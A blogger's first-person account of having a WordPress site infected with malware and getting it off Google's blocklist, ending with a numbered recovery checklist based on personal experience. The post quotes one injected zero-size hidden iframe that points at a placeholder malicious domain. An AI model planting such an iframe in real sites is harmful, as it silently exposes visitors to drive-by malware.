What to do when you’ve been hacked.

W

Or maybe this post should be called; what I did when I was hacked. Either way . . .

I was recently hacked and wanted to share my experience to help those unfortunate souls that this happens to. There are lots of ways to get hacked and in my case it was Malware. (Malware? is that Tupperware you get from the mall?) The hacker most likely got in via some old libraries I had from Scriptaculous or some files from an Axure generated file. Either way. The got in. When a user went to my site using Firefox, Safari or Chrome it looked like the image below. IE was fine of course!

I was working on my blog in the WP admin when this came up. I had no idea what the hell was going on. I clicked on the ignore this warning link in the bottom right hand corner. It took me to my site where it appeared as though all was well. I clicked  back and then clicked the Why was this site blocked? button. I got the following (screenshot located here):

Safe Browsing

Diagnostic page for michaelmyers.biz

What is the current listing status for michaelmyers.biz

The site is not currently listed as suspicious.

What happened when Google visited the site?

Of the 2 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last tiem Google visited the site was on 2009-06-15, and suspicious content was never found on the site within the pagst 90 days.

The site was hosted on 1 network(s) including AS26347 (DREAMHOST)

Has the site acted as an intermediary resulting in further distribution of Malware?

Over the past 90 days, michaelmyers.biz did not appear to function as an intermediary for the infection of any sites.

Has the site hosted Malware?

No, this site has not hosted malicious software over the last 90 days.

Next Steps:

  • Return to the previous page
  • If you are the owner of this web site, you can request a review of your site using Google Webmaster tools. More information about the review process is available in Google’s Webmaster Help Center.

After reading this I was more than just confused. I was pissed off. This alert tells me that everything is alright and that I’ve done nothing wrong. WTF!?!?! I then went to my Google Webmaster tools account and saw essentially the same status. I contacted Dreamhost (my ISP) and let them know what was up.

About 2 hours later I went back to my site and the message was now quite different. It listed uadrenal as a threat, via my site. About the same time I got this, I received an email from Dreamhost. They said they had found a suspicious iframe in many of my files.

<iframe src=”http://<hackingbastards>.com” width=0 height=0 style=”hidden” frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>


I then spent many minutes manually removing these entries from my files. (I really wish Matt Mensch (@themensch) had been there so he could have whipped script magic on it.) Anyway, I cleared it out and then found out online that I needed to resubmit my site for reconsideration. When I went to Google’s Webmaster tools, there was no mention of Malware specific to my site. I looked and found what I believed to be the right reconsideration request. I then asked several online experts and they told me that I should NEVER have my site reconsidered if it had established any SEO based traffic. But I could not find anywhere else to have my site revisited to get it cleared. So I submitted my site in the Google webmaster tools, knowing that it was not the right step; but willing to try anything since there were no other options visible. (This is now 24 hours after the initial explosion.) 48 hours after the hack, I logged into Google webmaster tools to see an alert that essentially read: You’re site has been identified as distributing Malware. Once you have removed the Malware, click here for a review to insure your site is ready for primetime. I completed the brief form and waited to hear back. Within 24 hours Google had my site cleared and the Malware warning was gone. Unfortunately there was no way to stop the reconsideration and since then I have all but vanished from search results. If you have existing Google juice DON’T EVER submit your site for reconsideration. (The option lives on the left hand side of the Google Webmaster Tools interface; marked ‘Site Reconsideration’. I am curious to see when my site/posts come back.)

This is my story and I hope it doesn’t happen to you. If you get hacked,I would suggest the following steps:

  1. Notify ISP and see if they can tell you what has happened/what to do.
  2. After 1 -2 hours check back at the warning message and see if there is a URL included in the warning message.
  3. Clean up the mess if the ISP won’t (either from the ISP or the Google warning; you should now know what to look for and remove it. Dreamhost is excellent.)
  4. Check for old software and update were needed.
  5. DO NOT request your site be reconsidered in the Google Webmaster Tools interface.
  6. Keep checking back with Google Webmaster Tools until you see the Malware message.
  7. Once you see that message, there will be a link included to have them review your site; do this.
  8. Site should come back in less than 6 hours (although favicons in Firefox may be terminally hosed).

Overall my experience was pretty good (except for that whole hacking thing). Google got my site, out of millions, back on the road in less than 24 hours after the review. The issue was that the message telling me what to do, did not show up for 48 hours. For my business/blog – very uncomfortable. For an eCommerce based business, this timeframe could be deadly. Maybe the timeframe is based on traffic. I don’t know.

The other consideration when this happens is Twitter. If you listed your site in your Twitter account and it gets hacked, your Twitter account will be locked. There is a mechanism that helps deter “bad folks” from using Twitter to get Malware installed. Twitter had my account reinstated within several hours. The initial feeling was that the hacker had all my information. My site account info. My Twitter account info. etc. Not a good feeling. Hope this never happens to you and if it does, I hope this recipe helps.

6 comments